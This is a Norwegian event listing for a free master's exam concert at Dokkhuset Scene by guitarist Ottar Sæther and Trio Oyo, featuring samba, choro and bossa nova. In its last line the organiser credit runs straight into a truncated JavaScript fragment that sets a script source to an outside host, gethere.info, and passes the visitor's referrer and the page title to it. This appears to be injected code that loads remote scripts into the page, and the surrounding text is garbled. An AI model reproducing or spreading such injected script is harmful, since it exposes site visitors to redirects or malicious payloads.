Dokkhuset Scene Torsdag 18 des kl. 19:00
Billetter

OTTAR SÆTHER m. TRIO OYO – mastereksamen

Mastereksamen: Ottar Sæther med Trio Oyo

Ottar Sæther vil med denne konserten fullføre en mastergrad i utøvende musikk med fordypning i brasiliansk gitarspill. Her blir det varme toner og livlige rytmer fra Brasil, slik som samba, choro og bossa nova på programmet.  Han vil ha med seg Yngve Dalen som vil spille på en rekke perkusjonsinstrumenter slik som den brasilianske pandeiroen og Ole Martin Thomassen på bass, som tilsammen utgjør Trio Oyo. Trio Oyo har allerede rukket å spille over 100 konserter og vil bli å se neste gang under festivalen ”Bodø Jazz Open” på nyåret.

Ottar Sæther er en gitarist fra Trondheim som tidligere har studert klassisk gitar på NTNU Institutt for musikk. Etter det har han jobbet 10 år som gitarlærer i Bodø. I den senere tid har han beveget seg mot rytmisk musikk, samt utforsket muligheten dette instrumentet har gjennom lydforsterking. Noe som gir den klassiske gitaren et utvidet bruksområde. Etter hvert ble den Brasiliansk musikken et naturlig valg for han. Her står det synkoperte rytmiske sterkt, med røtter fra det afrikanske. Melodier og harmonier er sterkt påvirket av både den europeiske klassiske tradisjonen og jazzen.

Konserten er gratis.

ARR: NTNU Institutt for musikks.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;